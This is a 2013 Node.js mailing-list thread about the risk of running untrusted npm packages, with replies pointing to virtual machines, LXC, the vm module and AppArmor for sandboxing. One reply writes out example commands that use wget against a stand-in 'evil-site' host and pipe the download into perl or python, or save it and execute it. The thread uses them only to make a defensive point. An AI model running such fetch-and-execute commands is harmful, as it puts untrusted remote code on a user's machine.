17.12.2013, 15:07, "Alexander" <alexo...@gmail.com>:
> Thank you for the reply.
> Why the security implications of running node.js are not related to node.js
> is hard to understand (can you give a reason)?

If you run "wget http://evil-site/virus.pl -O - | perl", is it related to perl? 
Is it a vulnerability in perl?

If you run "wget http://evil-site/virus.py -O - | python", is it related to 
python? Is it a vulnerability in python?

What happens if you run "wget http://evil-site/virus && ./virus"?


> While I agree for other reasons maybe with your suggestions (i.e. I can
> see reasons to not use Windows (which is really unrelated to node.js)),
>
> I am telling you that it would be nice to have the chance to safely
> run untrusted code.

As I said, you can do it in a virtual machine.


> For me that would be a big deal related to node.js, because to safely
> or "relatively more safely" run untrusted code would require being
> able to reduce the privileges, access rights and permissions of
> what the untrusted code can do.
> For example some code should not be able to touch "fs" kind of functions.
> Such sandboxing would have to happen inside node.js (that is why I ask
> on this list).

Oh well yeah, here is some helpful sandboxing stuff:
http://nodejs.org/api/vm.html


> Also there have been efforts (maybe they are good):
>
> https://github.com/gf3/sandbox
> (I think it generates a way to reduce the privileges of untrusted code by
> spawning a child process which lacks access to global...). I am not sure
> how it works in detail (maybe somebody can tell). This could help with cases
> as suggested in the examples.js section.

It forks node.js and creates a new empty context in the child process. Yes,
that would work.


>
> There have been efforts
> https://github.com/gf3/sandbox/blob/master/example/example.js
>
> Some remarks still to the "Do not use windows". If you meant Microsoft stuff
> (window is, in a Javascript context, somewhat an ambiguous term) then I can
> only suggest that Linux would not be much safer. Really, linux distributions
> are overrated in terms of safety.

In Linux it is hard to work under root. In Windows it's hard to NOT work under
root. That's all there is.

I'm not even mentioning capabilities and containers.


> Just by running one would not suddenly reduce risks of running untrusted
> code in node.js.
> Anyway, with AppArmor it can be done to limit node.js access. If there is
> a profile, that would help everybody that runs node.js on Ubuntu systems,
> which, like it or not, is a common linux distribution.
>
> Thanks Alex
>
> On 12/17/2013 11:56 AM, Alex Kocharin wrote:
>
>>  It has nothing to do with node.js.
>>
>>  And actually it is very simple:
>>
>>  1. Do not run untrusted code.
>>  2. Do not use windows.
>>
>>  If you have to run something you don't trust, LXC is suggested. But
>>  again, it has nothing to do with node.js in particular, and it's true
>>  for almost all programs out there.
>>
>>  17.12.2013, 14:47, "ofencito" <alexo...@gmail.com>:
>>>  Dear all,
>>>  I really like node.js. Great to have JS also in the command line.
>>>  Only worry I have is security.
>>>
>>>  there is for example this https://github.com/hacksparrow/virus
>>>
>>>  Let us be honest. Once we have installed node.js we like to extend its
>>>  utility, installing packages.
>>>  Not all of us do a thorough code audit before. Consequently I am worried
>>>  what would happen if the "untrusted" code I run would do harm to my system.
>>>  This is already a concern in browsers (and greatly motivates people
>>>  to use NoScript etc.)
>>>
>>>  How have you guys managed to protect your system from node.js?
>>>  Basically it should be somewhat protected (if run in linux) since you
>>>  most likely run it under your user account. Better even, you could run it
>>>  as an unprivileged user (suggestion 1).
>>>  Still I see much potential to provoke havoc and chaos....
>>>  with all its powers... node.js resembles an open door to the system
>>>  (which it really actually should be, with the exception of untrusted code).
>>>
>>>  For those who know it: do you have an AppArmor profile that restricts
>>>  the stuff that node.js can do on your PC? If so, can you share?
>>>  Do you run node.js in a virtual container/machine?
>>>  How do you protect your stuff in node.js from other stuff in node.js?
>>>
>>>  Thanks for your insights
>>>
>>>  --
>>>  --
>>>  Job Board: http://jobs.nodejs.org/
>>>  Posting guidelines:
>>>  https://github.com/joyent/node/wiki/Mailing-List-Posting-Guidelines
>>>  You received this message because you are subscribed to the Google
>>>  Groups "nodejs" group.
>>>  To post to this group, send email to nodejs@googlegroups.com
>>>  <mailto:nodejs@googlegroups.com>
>>>  To unsubscribe from this group, send email to
>>>  nodejs+unsubscr...@googlegroups.com
>>>  <mailto:nodejs+unsubscr...@googlegroups.com>
>>>  For more options, visit this group at
>>>  http://groups.google.com/group/nodejs?hl=en?hl=en
>>>
>>>  ---
>>>  You received this message because you are subscribed to the Google
>>>  Groups "nodejs" group.
>>>  To unsubscribe from this group and stop receiving emails from it,
>>>  send an email to nodejs+unsubscr...@googlegroups.com
>>>  <mailto:nodejs+unsubscr...@googlegroups.com>.
>>>  For more options, visit https://groups.google.com/groups/opt_out.
>

